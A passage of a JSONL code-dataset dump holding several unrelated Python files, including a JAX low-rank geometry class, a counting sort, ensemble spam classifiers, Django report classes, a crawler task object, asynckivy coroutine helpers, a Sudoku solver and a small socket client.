First is O(nm), the other is O((n+m)r^2).\n if n * m < (n + m) * r ** 2: # better use regular apply\n return super().apply_square_cost(arr, axis)\n\n new_cost_1 = self.cost_1[:, :, None] * self.cost_1[:, None, :]\n new_cost_2 = self.cost_2[:, :, None] * self.cost_2[:, None, :]\n return LRCGeometry(\n cost_1=new_cost_1.reshape((n, r ** 2)),\n cost_2=new_cost_2.reshape((m, r ** 2))\n ).apply_cost(arr, axis)\n\n def _apply_cost_to_vec(\n self,\n vec: jnp.ndarray,\n axis: int = 0,\n fn: Optional[Callable[[jnp.ndarray], jnp.ndarray]] = None,\n is_linear: bool = False,\n ) -> jnp.ndarray:\n \"\"\"Apply [num_a, num_b] fn(cost) (or transpose) to vector.\n\n Args:\n vec: jnp.ndarray [num_a,] ([num_b,] if axis=1) vector\n axis: axis on which the reduction is done.\n fn: function optionally applied to cost matrix element-wise, before the\n doc product\n is_linear: Whether ``fn`` is a linear function to enable efficient\n implementation. See :func:`ott.geometry.geometry.is_linear`\n for a heuristic to help determine if a function is linear.\n\n Returns:\n A jnp.ndarray corresponding to cost x vector\n \"\"\"\n\n def linear_apply(\n vec: jnp.ndarray, axis: int, fn: Callable[[jnp.ndarray], jnp.ndarray]\n ) -> jnp.ndarray:\n c1 = self.cost_1 if axis == 1 else self.cost_2\n c2 = self.cost_2 if axis == 1 else self.cost_1\n c2 = fn(c2) if fn is not None else c2\n bias = fn(self.bias) if fn is not None else self.bias\n out = jnp.dot(c1, jnp.dot(c2.T, vec))\n return out + bias * jnp.sum(vec) * jnp.ones_like(out)\n\n if fn is None or is_linear:\n return linear_apply(vec, axis, fn=fn)\n return super()._apply_cost_to_vec(vec, axis, fn=fn)\n\n def compute_max_cost(self) -> float:\n \"\"\"Compute the maximum of the :attr:`cost_matrix`.\n\n Three cases are taken into account:\n\n - If the number of samples of ``cost_1`` and ``cost_2`` are both smaller\n than 1024 and if ``batch_size`` is `None`, the ``cost_matrix`` is\n computed to obtain its maximum entry.\n - If one of the number of samples of ``cost_1`` or ``cost_2`` is larger\n than 1024 and if ``batch_size`` is `None`, then the maximum of the\n cost matrix is calculated by batch. The batches are created on the\n longest axis of the cost matrix and their size is fixed to 1024.\n - If ``batch_size`` is provided as a float, then the maximum of the cost\n matrix is calculated by batch. 
The batches are created on the longest\n axis of the cost matrix and their size if fixed by ``batch_size``.\n\n Returns:\n Maximum of the cost matrix.\n \"\"\"\n batch_for_y = self.shape[1] > self.shape[0]\n\n n = self.shape[1] if batch_for_y else self.shape[0]\n p = self._cost_2.shape[1] if batch_for_y else self._cost_1.shape[1]\n carry = ((self._cost_1, self._cost_2) if batch_for_y else\n (self._cost_2, self._cost_1))\n\n if self.batch_size:\n batch_size = min(self.batch_size, n)\n else:\n batch_size = min(1024, max(self.shape[0], self.shape[1]))\n n_batch = n // batch_size\n\n def body(carry, slice_idx):\n cost1, cost2 = carry\n cost2_slice = jax.lax.dynamic_slice(\n cost2, (slice_idx * batch_size, 0), (batch_size, p)\n )\n out_slice = jnp.max(jnp.dot(cost2_slice, cost1.T))\n return carry, out_slice\n\n def finalize(carry):\n cost1, cost2 = carry\n return jnp.dot(cost2[n_batch * batch_size:], cost1.T)\n\n _, out = jax.lax.scan(body, carry, jnp.arange(n_batch))\n last_slice = finalize(carry)\n max_value = jnp.max(jnp.concatenate((out, last_slice.reshape(-1))))\n return max_value + self._bias\n\n def to_LRCGeometry(\n self,\n rank: int = 0,\n tol: float = 1e-2,\n rng: Optional[jax.random.PRNGKeyArray] = None,\n scale: float = 1.0,\n ) -> \"LRCGeometry\":\n \"\"\"Return self.\"\"\"\n del rank, tol, rng, scale\n return self\n\n @property\n def can_LRC(self): # noqa: D102\n return True\n\n def subset( # noqa: D102\n self, src_ixs: Optional[jnp.ndarray], tgt_ixs: Optional[jnp.ndarray],\n **kwargs: Any\n ) -> \"LRCGeometry\":\n\n def subset_fn(\n arr: Optional[jnp.ndarray],\n ixs: Optional[jnp.ndarray],\n ) -> jnp.ndarray:\n return arr if arr is None or ixs is None else arr[jnp.atleast_1d(ixs)]\n\n return self._mask_subset_helper(\n src_ixs, tgt_ixs, fn=subset_fn, propagate_mask=True, **kwargs\n )\n\n def mask( # noqa: D102\n self,\n src_mask: Optional[jnp.ndarray],\n tgt_mask: Optional[jnp.ndarray],\n mask_value: float = 0.,\n ) -> \"LRCGeometry\":\n\n def mask_fn(\n arr: Optional[jnp.ndarray],\n mask: Optional[jnp.ndarray],\n ) -> Optional[jnp.ndarray]:\n if arr is None or mask is None:\n return arr\n return jnp.where(mask[:, None], arr, mask_value)\n\n src_mask = self._normalize_mask(src_mask, self.shape[0])\n tgt_mask = self._normalize_mask(tgt_mask, self.shape[1])\n return self._mask_subset_helper(\n src_mask, tgt_mask, fn=mask_fn, propagate_mask=False\n )\n\n def _mask_subset_helper(\n self,\n src_ixs: Optional[jnp.ndarray],\n tgt_ixs: Optional[jnp.ndarray],\n *,\n fn: Callable[[Optional[jnp.ndarray], Optional[jnp.ndarray]],\n Optional[jnp.ndarray]],\n propagate_mask: bool,\n **kwargs: Any,\n ) -> \"LRCGeometry\":\n (c1, c2, src_mask, tgt_mask, *children), aux_data = self.tree_flatten()\n c1 = fn(c1, src_ixs)\n c2 = fn(c2, tgt_ixs)\n if propagate_mask:\n src_mask = self._normalize_mask(src_mask, self.shape[0])\n tgt_mask = self._normalize_mask(tgt_mask, self.shape[1])\n src_mask = fn(src_mask, src_ixs)\n tgt_mask = fn(tgt_mask, tgt_ixs)\n\n aux_data = {**aux_data, **kwargs}\n return type(self).tree_unflatten(\n aux_data, [c1, c2, src_mask, tgt_mask] + children\n )\n\n def __add__(self, other: \"LRCGeometry\") -> \"LRCGeometry\":\n if not isinstance(other, LRCGeometry):\n return NotImplemented\n return LRCGeometry(\n cost_1=jnp.concatenate((self.cost_1, other.cost_1), axis=1),\n cost_2=jnp.concatenate((self.cost_2, other.cost_2), axis=1),\n bias=self._bias + other._bias,\n # already included in `cost_{1,2}`\n scale_factor=1.0,\n scale_cost=1.0,\n )\n\n @property\n def dtype(self) -> 
jnp.dtype: # noqa: D102\n return self._cost_1.dtype\n\n def tree_flatten(self): # noqa: D102\n return (\n self._cost_1,\n self._cost_2,\n self._src_mask,\n self._tgt_mask,\n self._epsilon_init,\n self._bias,\n self._scale_factor,\n ), {\n \"scale_cost\": self._scale_cost,\n \"batch_size\": self.batch_size\n }\n\n @classmethod\n def tree_unflatten(cls, aux_data, children): # noqa: D102\n c1, c2, src_mask, tgt_mask, epsilon, bias, scale_factor = children\n return cls(\n c1,\n c2,\n bias=bias,\n scale_factor=scale_factor,\n epsilon=epsilon,\n src_mask=src_mask,\n tgt_mask=tgt_mask,\n **aux_data\n )\n","sub_path":"src/ott/geometry/low_rank.py","file_name":"low_rank.py","file_ext":"py","file_size_in_byte":12295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"136818913","text":"a = input() # Read the input data\na = a.split()\n\nfor i in range(len(a)):\n a[i] = int(a[i])\n\ndiapazon = 1 + max(a) - min(a) # Compute the range\nb = [0] * diapazon\n\nfor i in range(len(a)): # Count the occurrences of each distinct element\n b[a[i] - min(a)] += 1\n\nmin = min(a)\nmax = max(a)\n\nc = []\nfor i in range(diapazon): # Output the result\n while b[i] > 0:\n c.append(min+ i)\n b[i] -= 1\nprint(c)\n\n","sub_path":"FOX/Sortirovka_podchetom.py","file_name":"Sortirovka_podchetom.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"20959931","text":"\nimport random\nimport math\nimport numpy\nfrom sklearn import tree, svm, preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.naive_bayes import GaussianNB, MultinomialNB, BernoulliNB\n\ndef main(task):\n\tif task == 1 :\n\t\tprint(\"Bagging + SVM\")\n\telif task == 2 :\n\t\tprint(\"Bagging + DTree\")\n\telif task == 3 :\n\t\tprint(\"Adaboost + SVM\")\n\telif task == 4 :\n\t\tprint(\"Adaboost + DTree\")\n\telif task == 5 :\n\t\tprint(\"Bagging + Gaussian Naive Bayes\")\n\telif task == 6 :\n\t\tprint(\"Adaboost + Gaussian Naive Bayes\")\n\n\tdataList = []\n\tattributesList = []\n\tX = []\n\ty = []\n\n\t#read data\n\t#sourceData = open(\"ContentNewLinkAllSample.csv\",'r')\n\tsourceData = open(\"ex1.csv\",'r') # only transformed link features\n\t#sourceData = open(\"ex2.csv\",'r') # only content features\n\t\n\t#read label (first line of the input file)\n\tline = sourceData.readline()\n\tline = line.strip('\\n')\t\t\t\t\t\n\tlineSplit = line.split(',')\t\t\t\t\n\tattributesList.append(lineSplit)\t\t\t\n\t\n\t#read data (rest of the input file)\n\tline = sourceData.readline()\n\twhile line:\n\t\tline = line.strip('.\\n')\t\t\t\n\t\tlineSplit = line.split(',')\t\t\t\n\t\tdataList.append( lineSplit ) \t\n\t\tline = sourceData.readline()\t\t\n\n\tsourceData.close()\n\n\t#convert data from string to float (except the class) and separate to X & y\n\tfor data in dataList :\n\t\t#print(data)\n\t\tif data[-1] == \"spam\\r\" :\n\t\t\ty.append(0)\n\t\telse :\n\t\t\ty.append(1)\n\t\tX.append( [float(key) for key in data[:-1]] )\n\n\t#print(y)\n\t#normalize\n\tX = preprocessing.normalize(X)\n\n\t# print(attributesList)\n\t# print(dataList[0])\n\n\t#get training set & test set by resampling\n\tX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\n\tif task == 1 or task == 2 or task == 5: #1Bagging + SVM / #2Bagging + DTree\n\t\tbootstrapSize = 100\n\t\tresult = []\n\t\tpredict = []\n\t\t#start single training\n\t\tfor i in range(bootstrapSize) :\n\t\t\tX_temp = []\n\t\t\ty_temp =
[]\n\t\t\t#get trainging set for bagging\n\t\t\tfor j in range( len(X_train) ):\n\t\t\t\tk = random.randint(0, len(X_train) - 1)\n\t\t\t\tX_temp.append( X_train[k] )\n\t\t\t\ty_temp.append( y_train[k] )\n\t\t\t#set classifier\n\t\t\tif task == 1:\n\t\t\t\tclf = svm.LinearSVC(dual=False)\n\t\t\tif task == 2:\n\t\t\t\tclf = tree.DecisionTreeClassifier()\n\t\t\tif task == 5:\n\t\t\t\tclf = GaussianNB()\n\t\t\tclf.fit(X_temp , y_temp)\n\t\t\t#predict by single training\n\t\t\tresult.append( clf.predict(X_test) )\n\t\t#predict by bagging\n\t\tfor i in range(len(y_test)):\n\t\t\tcount = 0\n\t\t\tfor j in range(bootstrapSize):\n\t\t\t\tif result[j][i] ==1 :\n\t\t\t\t\tcount += 1\n\t\t\tif count > bootstrapSize/2 :\n\t\t\t\tpredict.append(1)\n\t\t\telse :\n\t\t\t\tpredict.append(0)\n\t\t#calc the correct ratio\n\t\tcorrectRatio = 0.0\n\t\tfor i in range( len(y_test) ) :\n\t\t\tif y_test[i] == predict[i] :\n\t\t\t\tcorrectRatio += 1\n\t\tcorrectRatio = correctRatio / len(X_test)\n\t\tprint(correctRatio)\n\n\tif task == 3 or task == 4 or task == 6: #3AdaBoost + SVM #4AdaBoost + DTree\n\t\tbootstrapSize = 100\n\t\tresult = []\n\t\tpredict = []\n\t\tweight = [1.0/len(X_train) for x in X_train]\n\t\tbeta = [0.0 for x in range(bootstrapSize)]\n\n\t\t#start single training\n\t\tfor i in range(bootstrapSize) :\n\t\t\t#set classifier\n\t\t\tif task == 3:\n\t\t\t\tclf = svm.LinearSVC(dual=False)\n\t\t\tif task == 4:\n\t\t\t\tclf = tree.DecisionTreeClassifier()\n\t\t\tif task == 6:\n\t\t\t\tclf = GaussianNB()\n\t\t\t\tweight = numpy.array(weight)\n\t\t\tclf.fit(X_train , y_train , sample_weight = weight)\n\t\t\t#predict the training set\n\t\t\tresult_temp = clf.predict(X_train)\n\t\t\t#update beta\n\t\t\terrorWeight = sum( [0.0 if result_temp[j]==y_train[j] else weight[j] for j in range( len(X_train) ) ] ) \n\t\t\tbeta[i] = errorWeight / (1 - errorWeight)\n\t\t\t#update weight\n\t\t\tweight = [ weight[j]*beta[i] if result_temp[j]==y_train[j] else weight[j] for j in range( len(X_train) ) ] \n\t\t\tweightSum = sum(weight)\n\t\t\tweight = [ weight[j]/weightSum for j in range( len(X_train) ) ]\n\t\t\t#predict the test set by single training\n\t\t\tresult_temp = clf.predict(X_test)\n\t\t\tresult.append([math.log(1/beta[i]) if x == 1 else -math.log(1/beta[i]) for x in result_temp])\n\n\t\t#predict by Adaboost\n\t\tfor i in range(len(y_test)):\n\t\t\tcount = 0.0\n\t\t\tfor j in range(bootstrapSize):\n\t\t\t\tcount += result[j][i]\n\t\t\tif count > 0 :\n\t\t\t\tpredict.append(1)\n\t\t\telse :\n\t\t\t\tpredict.append(0)\n\t\t#calc the correct ratio\n\t\tcorrectRatio = 0.0\n\t\tfor i in range( len(y_test) ) :\n\t\t\tif y_test[i] == predict[i] :\n\t\t\t\tcorrectRatio += 1\n\t\tcorrectRatio = correctRatio / len(X_test)\n\t\tprint(correctRatio)\n\nfor i in range(1,7):\n\tmain(i)\n","sub_path":"复试/人工智能/机器学习概论/hw/2017实验/exp2/实验二/2014011328/exp2.py","file_name":"exp2.py","file_ext":"py","file_size_in_byte":4350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"447882909","text":"from django.urls import reverse\n\nfrom custom.icds import icds_toggles\nfrom corehq.apps.locations.permissions import location_safe\nfrom corehq.apps.reports.filters.select import YearFilter\nfrom corehq.apps.reports.standard import CustomProjectReport\nfrom custom.icds_reports.asr_sqldata import ASRIdentification, ASROperationalization, ASRPopulation, Annual, \\\n DisabledChildren, Infrastructure, Equipment\nfrom custom.icds_reports.filters import ICDSMonthFilter, IcdsLocationFilter, 
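# The two hand-rolled loops above implement bagging (bootstrap resample,
# majority vote) and AdaBoost.M1 (beta = err / (1 - err), reweighting,
# log(1/beta) votes). For comparison, a short sketch of the scikit-learn
# equivalents, assuming scikit-learn is installed; results will differ in
# detail because the script manages its own resampling and weights.

from sklearn.datasets import make_classification
from sklearn.ensemble import AdaBoostClassifier, BaggingClassifier
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier

X, y = make_classification(n_samples=500, random_state=42)
X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.2, random_state=42)

bagging = BaggingClassifier(DecisionTreeClassifier(), n_estimators=100, random_state=42)
boosting = AdaBoostClassifier(n_estimators=100, random_state=42)  # decision stumps by default
for clf in (bagging, boosting):
    clf.fit(X_tr, y_tr)
    print(type(clf).__name__, clf.score(X_te, y_te))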
IcdsASRLocationFilter\nfrom custom.icds_reports.mpr_sqldata import MPRIdentification, MPRSectors, MPRPopulation, MPRBirthsAndDeaths, \\\n MPRAWCDetails, MPRSupplementaryNutrition, MPRUsingSalt, MPRProgrammeCoverage, MPRPreschoolEducation, \\\n MPRGrowthMonitoring, MPRImmunizationCoverage, MPRVhnd, MPRReferralServices, MPRMonitoring, \\\n MPROperationalizationBeta, MPRPopulationBeta, MPRGrowthMonitoringBeta, MPRSupplementaryNutritionBeta, \\\n MPRMonitoringBeta, MPRVhndBeta, MPRUsingSaltBeta, MPRImmunizationCoverageBeta, MPRPreschoolEducationBeta, \\\n MPRProgrammeCoverageBeta, MPRAWCDetailsBeta, MPRReferralServicesBeta, MPRBirthsAndDeathsBeta\n\nfrom custom.icds_reports.mpr_sqldata import MPROperationalization\nfrom custom.icds_reports.reports import IcdsBaseReport\n\n\n@location_safe\nclass MPRReport(IcdsBaseReport):\n\n title = 'Monthly Progress Report (MPR)'\n slug = 'mpr_report'\n name = 'MPR'\n\n fields = [IcdsLocationFilter, ICDSMonthFilter, YearFilter]\n\n @property\n def data_provider_classes(self):\n return [\n MPRIdentification,\n MPROperationalization if not self.icds_pre_release_features() else MPROperationalizationBeta,\n MPRSectors,\n MPRPopulation if not self.icds_pre_release_features() else MPRPopulationBeta,\n MPRBirthsAndDeaths if not self.icds_pre_release_features() else MPRBirthsAndDeathsBeta,\n MPRAWCDetails if not self.icds_pre_release_features() else MPRAWCDetailsBeta,\n MPRSupplementaryNutrition if not self.icds_pre_release_features() else MPRSupplementaryNutritionBeta,\n MPRUsingSalt if not self.icds_pre_release_features() else MPRUsingSaltBeta,\n MPRProgrammeCoverage if not self.icds_pre_release_features() else MPRProgrammeCoverageBeta,\n MPRPreschoolEducation if not self.icds_pre_release_features() else MPRPreschoolEducationBeta,\n MPRGrowthMonitoring if not self.icds_pre_release_features() else MPRGrowthMonitoringBeta,\n MPRImmunizationCoverage if not self.icds_pre_release_features() else MPRImmunizationCoverageBeta,\n MPRVhnd if not self.icds_pre_release_features() else MPRVhndBeta,\n MPRReferralServices if not self.icds_pre_release_features() else MPRReferralServicesBeta,\n MPRMonitoring if not self.icds_pre_release_features() else MPRMonitoringBeta\n ]\n\n\n@location_safe\nclass ASRReport(IcdsBaseReport):\n\n title = 'Annual Status Report (ASR)'\n slug = 'asr_report'\n name = 'ASR'\n\n fields = [IcdsASRLocationFilter]\n\n @property\n def data_provider_classes(self):\n cls_list = [\n ASRIdentification,\n ASROperationalization,\n ASRPopulation,\n Annual,\n DisabledChildren,\n Infrastructure,\n Equipment\n ]\n return cls_list\n\n\n@location_safe\nclass DashboardReport(CustomProjectReport):\n slug = 'dashboard_report'\n name = 'Dashboard ICDS-CAS'\n\n @classmethod\n def get_url(cls, domain=None, **kwargs):\n return reverse('icds_dashboard', args=[domain])\n\n @classmethod\n def show_in_navigation(cls, domain=None, project=None, user=None):\n return icds_toggles.DASHBOARD_ICDS_REPORT.enabled(domain)\n","sub_path":"custom/icds_reports/reports/reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":3743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"252196373","text":"\n'''\nCopyright (c)2008-2009 Serendio Software Private Limited\nAll Rights Reserved\n\nThis software is confidential and proprietary information of Serendio Software. It is disclosed pursuant to a non-disclosure agreement between the recipient and Serendio. 
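# Every entry in data_provider_classes above repeats the same
# "stable unless icds_pre_release_features()" conditional. A hypothetical
# helper (a refactor sketch, not part of the original module) would collapse
# the repetition:

def _pick(self, stable_cls, beta_cls):
    # beta implementations take over when pre-release features are enabled
    return beta_cls if self.icds_pre_release_features() else stable_cls

# e.g. self._pick(MPRPopulation, MPRPopulationBeta) inside data_provider_classes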
This source code is provided for informational purposes only, and Serendio makes no warranties, either express or implied, in this. Information in this program, including URL and other Internet website references, is subject to change without notice. The entire risk of the use or the results of the use of this program remains with the user. Complying with all applicable copyright laws is the responsibility of the user. Without limiting the rights under copyright, no part of this program may be reproduced, stored in, or introduced into a retrieval system, or distributed or transmitted in any form or by any means (electronic, mechanical, photocopying, recording, on a website, or otherwise) or for any purpose, without the express written permission of Serendio Software.\n\nSerendio may have patents, patent applications, trademarks, copyrights, or other intellectual property rights covering subject matter in this program. Except as expressly provided in any written license agreement from Serendio, the furnishing of this program does not give you any license to these patents, trademarks, copyrights, or other intellectual property.\n'''\n\nfrom sessioninfo import SessionInfo\n\nclass Task(object):\n def __init__(self, instance_data, connector_instance_log_id,\n workspace_id, client_id, client_name, connector_instance_id,\n dburi, priority = 10, keywords = None, level = 1,\n highlight_words=None, token = (), times_reenqueued=0):\n\n ##minimum requirements begin##\n\n ##for sending a task, getting linksout, getting dbentry for a task\n self.connClass = None\n self.instance_data = instance_data\n self.token = token\n self.times_reenqueued = times_reenqueued\n\n #this will set the meta page level to 0,\n #thus increment/decrement is done at this one place and done with\n self.level=level\n# if self.instance_data.get('metapage'):\n# self.level= self.level - 1 \n\n self.session_info=SessionInfo()\n\n self.keywords = []\n if keywords:\n self.keywords=keywords\n self.highlight_words = []\n if highlight_words:\n self.highlight_words = highlight_words\n #maintained by linkouts, saved in Solr,\n self.priority = priority\n self.connector_instance_log_id = connector_instance_log_id\n\n #to be put in Solr\n self.client_id = client_id\n self.client_name=client_name\n self.workspace_id = workspace_id\n self.connector_instance_id = connector_instance_id\n self.dburi = dburi\n ##minimum requirements end##\n\n\n ##extras\n self.start_time=None\n self.end_time=None\n\n #the status'es of the four phases\n self.status = {}\n self.status['fetch_status'] = False\n self.status['fetch_message'] = ''\n self.status['filter_status'] = False\n self.status['extract_status'] = False\n\n self.pagedata = {}\n #used to set the title for a followed link\n #after following heuristics like length and same title\n self.pagedata['title'] = ''\n #used to set the created_date for 1. current article(now) and 2. A followed link(from link)\n # self.pagedata['posted_date'] = datetime.utcnow()#.utctimetuple()\n# #utcnow always - override\n# self.pagedata['pickup_date'] = datetime.utcnow()#.utctimetuple()\n# #store current page's hash\n# self.pagedata['content_hash'] = ''\n# #needed 1. when updated content found, retrieved from solr using the url\n# #and sent back for making the parent child relation 2. 
None default\n self.pagedata['parent_task_id'] = None #This data is stored in saveToDB\n# # using jsontext for storing the related uris\n# self.pagedata['related_uris']= []\n# #number of posts from a review or forum\n# self.pagedata['num_posts']=None\n \n\n def clone(self):\n '''\n Create a new task from the current task. Increment the level and\n set appropiate values for other elements\n '''\n #level+1 not always true - metapage\n if self.instance_data.get('metapage'):\n level = self.level\n else:\n level = self.level + 1\n t = Task(instance_data=self.instance_data.copy(), #session_info=self.session_info.copy(),\n connector_instance_log_id=self.connector_instance_log_id, workspace_id=self.workspace_id,\n client_id=self.client_id, client_name=self.client_name, \n connector_instance_id=self.connector_instance_id,dburi=self.dburi,\n priority=self.priority, keywords=self.keywords, level=level,\n highlight_words=self.highlight_words,token=self.token,\n times_reenqueued = self.times_reenqueued)\n\n # Other than original pages, others cannot be meta pages.\n t.instance_data['metapage'] = False\n t.instance_data['already_parsed'] = True # so that pages from metapage is not pickedup by googlesiteconnector\n return t\n\n \n def __repr__(self):\n res=str(self.instance_data)+\" : \"+\\\n str(self.priority)+\" : \"+str(self.level)\n return res\n\n\ndef getDummyTask():\n return Task(instance_data={'uri':'http://news.google.co.in',\n 'queryterm':u'motorola and rfid',\n 'metapage':False,\n 'category':u'News',\n 'versioned':False,\n 'apply_keywords':False\n },\n connector_instance_log_id=1,\n workspace_id=1,\n client_id=1,\n client_name='dummy',\n connector_instance_id=1,\n dburi=None\n )\n","sub_path":"crawler/utils/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":6141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"602348109","text":"'''Everything in this module doesn't depend on Kivy.'''\n\n__all__ = ('start', 'or_', 'and_', 'Event', )\n\nimport types\nimport typing\nfrom inspect import getcoroutinestate, CORO_CLOSED\n\n\ndef start(coro):\n '''Starts a asynckivy-flavored coroutine.\n Returns the argument itself.\n '''\n def step_coro(*args, **kwargs):\n try:\n if getcoroutinestate(coro) != CORO_CLOSED:\n coro.send((args, kwargs, ))(step_coro)\n except StopIteration:\n pass\n\n try:\n coro.send(None)(step_coro)\n except StopIteration:\n pass\n\n return coro\n\n\nclass Task:\n '''(internal)'''\n __slots__ = ('coro', 'done', 'result', 'done_callback')\n def __init__(self, coro, *, done_callback=None):\n self.coro = coro\n self.done = False\n self.result = None\n self.done_callback = done_callback\n async def _run(self):\n self.result = await self.coro\n self.done = True\n if self.done_callback is not None:\n self.done_callback()\n\n\n@types.coroutine\ndef gather(coros:typing.Iterable[typing.Coroutine], *, n:int=None) -> typing.Sequence[Task]:\n '''(internal)'''\n coros = tuple(coros)\n n_coros_left = n if n is not None else len(coros)\n\n def step_coro(*args, **kwargs):\n nonlocal n_coros_left; n_coros_left -= 1\n def done_callback():\n nonlocal n_coros_left\n n_coros_left -= 1\n if n_coros_left == 0:\n step_coro()\n tasks = tuple(Task(coro, done_callback=done_callback) for coro in coros)\n for task in tasks:\n start(task._run())\n\n if n_coros_left <= 0:\n return tasks\n\n def callback(step_coro_):\n nonlocal step_coro\n step_coro = step_coro_\n yield callback\n\n return tasks\n\n\nasync def or_(*coros):\n return await 
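# Note that Task.clone above copies instance_data with dict.copy(), which is
# shallow: any nested container stays shared between the original task and the
# clone. A quick illustration, with copy.deepcopy as the alternative if nested
# values are ever mutated:

import copy

original = {'uri': 'http://example.com', 'extra': {'depth': 1}}
shallow = original.copy()
deep = copy.deepcopy(original)
shallow['extra']['depth'] = 2
print(original['extra']['depth'])  # 2 -- mutated through the shallow copy
print(deep['extra']['depth'])      # 1 -- the deep copy is independent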
gather(coros, n=1)\n\n\nasync def and_(*coros):\n return await gather(coros)\n\n\nclass Event:\n '''Equivalent of 'trio.Event'\n '''\n __slots__ = ('_flag', '_step_coro_list')\n\n def __init__(self):\n self._flag = False\n self._step_coro_list = []\n\n def is_set(self):\n return self._flag\n\n def set(self):\n if self._flag:\n return\n self._flag = True\n step_coro_list = self._step_coro_list\n self._step_coro_list = []\n for step_coro in step_coro_list:\n step_coro()\n\n def clear(self):\n self._flag = False\n\n @types.coroutine\n def wait(self):\n yield (lambda step_coro: step_coro()) if self._flag \\\n else self._step_coro_list.append\n\n\n@types.coroutine\ndef _get_step_coro():\n '''(internal)'''\n return (yield lambda step_coro: step_coro(step_coro))[0][0]\n","sub_path":".buildozer/android/platform/build-armeabi-v7a/build/python-installs/Arhat/asynckivy/_core.py","file_name":"_core.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"301106895","text":"\"\"\"\nsudoku.py\n\nA program that solves a Sudoku puzzle.\n\nauthor: Wiley Matthews\n\"\"\"\nimport argparse\nimport sys\nimport os\nfrom typing import List\n\nfrom model import Model, print_board\nfrom view import View\nfrom controller import Controller\n\n\ndef check_file(filename: str) -> None:\n \"\"\"\n Checks that the specified file exists. If not, prints to error output then closes the program.\n :param filename: name of the file in question.\n :return: None\n \"\"\"\n if not os.path.exists(filename): # Check that data file exists\n sys.stderr.write(\"Error: \" + filename + \" does not exist!\")\n exit()\n\n\ndef get_args() -> argparse.Namespace:\n \"\"\"\n Defines and parses the program arguments.\n :return: a namespace containing the args.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Solves a Sudoku puzzle using backtracking and displays the solution.\")\n\n parser.add_argument('filename', help=\"board file\")\n parser.add_argument('-d', '--display', action='store_true',\n help='display the backtracking process')\n parser.add_argument('-s', '--save', action='store', help='save the resulting solution to the specified file')\n\n return parser.parse_args()\n\n\ndef read_board_file(filename: str) -> List[List[str]]:\n \"\"\"\n Read a board file.\n :param filename: filename/directory of Sudoku board file.\n :return: nested lists representing the puzzle.\n \"\"\"\n board = []\n with open(filename, 'r') as f:\n for line in f.readlines():\n board.append(line[:-1].split(' ')) # line[:-1] to cut off newline char.\n return board\n\n\ndef write_board_file(board: List[List[str]], filename: str) -> None:\n \"\"\"\n Takes a Sudoku puzzle as nested lists and writes them to the specified file.\n :param board: nested lists representing the puzzle.\n :param filename: filename/directory of Sudoku board file.\n :return: None\n \"\"\"\n with open(filename, 'w') as f:\n for row in board:\n f.write(' '.join(row) + '\\n') # newline denotes row endings.\n\n\ndef main() -> None:\n \"\"\"\n Parses program arguments solves the specified Sudoku puzzle, and prints the solution to standard output. 
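# The Event class above pairs with start(): a coroutine awaiting event.wait()
# parks its step_coro callback in _step_coro_list, and set() resumes every
# parked coroutine. Pasted below the definitions, this snippet runs as-is:

e = Event()

async def waiter():
    await e.wait()
    print('event fired')

start(waiter())   # waiter suspends inside e.wait()
e.set()           # resumes it -> prints 'event fired'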
Then saves\n and/or displays the solution as specified in the program arguments.\n :return: None\n \"\"\"\n args = get_args()\n check_file(args.filename)\n board = read_board_file(args.filename)\n board_copy = [row[::1] for row in board] # To save original board state if display is needed.\n model = Model(board)\n controller = Controller(model)\n controller.solveSudoku(model)\n print_board(controller.model.board)\n if args.save:\n write_board_file(model.board, args.save)\n print(\"Solution saved to\", args.save)\n if args.display:\n view = View(board_copy)\n view.start()\n print(\"Display complete\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"sudoku/sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"279832864","text":"# LED laberinth\n\n# Libraries\nfrom sense_emu import SenseHat\nfrom time import sleep\n\n# Create an object\nsense = SenseHat()\nsense.clear()\n\n# Define colours\nred = (255, 0, 0)\nblue = (0, 0, 255)\ngreen = (0, 255, 0)\nwhite = (255, 255, 255)\nyellow = (255, 255, 0)\n\n# Display letter\nsense.show_letter(\"H\", text_colour=green)\nsleep(1)\n\n# Change background\nsense.show_letter(\"Z\", text_colour=blue,back_colour=red)","sub_path":"code/Session8_LED/exercise1b.py","file_name":"exercise1b.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"510433353","text":"import socket\nimport pickle\n\nconn = socket.socket()\nconn.connect(('localhost', 9090))\n\nobj = {\n 'a': int(input(\"основание а = \")),\n 'b': int(input(\"основание b = \")),\n 'h': int(input(\"высота h = \"))\n}\n\ndata = pickle.dumps(obj)\n\nconn.sendall(data)\n\nda = conn.recv(4096)\nmsg = da.decode()\nprint(\"Площадь трапеции равна: \" + msg)\n\nconn.close()\n\n","sub_path":"students/К33402/Surina_Liza/lab_works/lab_1/task_2/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"453983849","text":"'''\r\nauthor: Joshua Christian, r0b0ts.inc\r\ndate: Thur 7, june 2018, 5 Idowu Tailor, Victoria Island.\r\nproject: ADAM:The first\r\nfile: image_processor.py\r\n\r\n'''\r\n\r\nfrom functions import *\r\nfrom prime_number_generator import 